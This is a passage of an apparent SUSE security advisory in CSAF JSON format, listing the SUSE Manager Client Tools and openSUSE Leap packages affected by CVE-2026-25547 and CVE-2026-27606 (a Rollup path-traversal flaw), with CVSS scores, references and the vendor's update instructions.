"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T10:11:52Z",
"details": "important"
}
],
"title": "CVE-2026-25547"
},
{
"cve": "CVE-2026-27606",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-27606"
}
],
"notes": [
{
"category": "general",
"text": "Rollup is a module bundler for JavaScript. Versions prior to 2.80.0, 3.30.0, and 4.59.0 of the Rollup module bundler (specifically v4.x and present in current source) is vulnerable to an Arbitrary File Write via Path Traversal. Insecure file name sanitization in the core engine allows an attacker to control output filenames (e.g., via CLI named inputs, manual chunk aliases, or malicious plugins) and use traversal sequences (`../`) to overwrite files anywhere on the host filesystem that the build process has permissions for. This can lead to persistent Remote Code Execution (RCE) by overwriting critical system or user configuration files. Versions 2.80.0, 3.30.0, and 4.59.0 contain a patch for the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-27606",
"url": "https://www.suse.com/security/cve/CVE-2026-27606"
},
{
"category": "external",
"summary": "SUSE Bug 1258846 for CVE-2026-27606",
"url": "https://bugzilla.suse.com/1258846"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
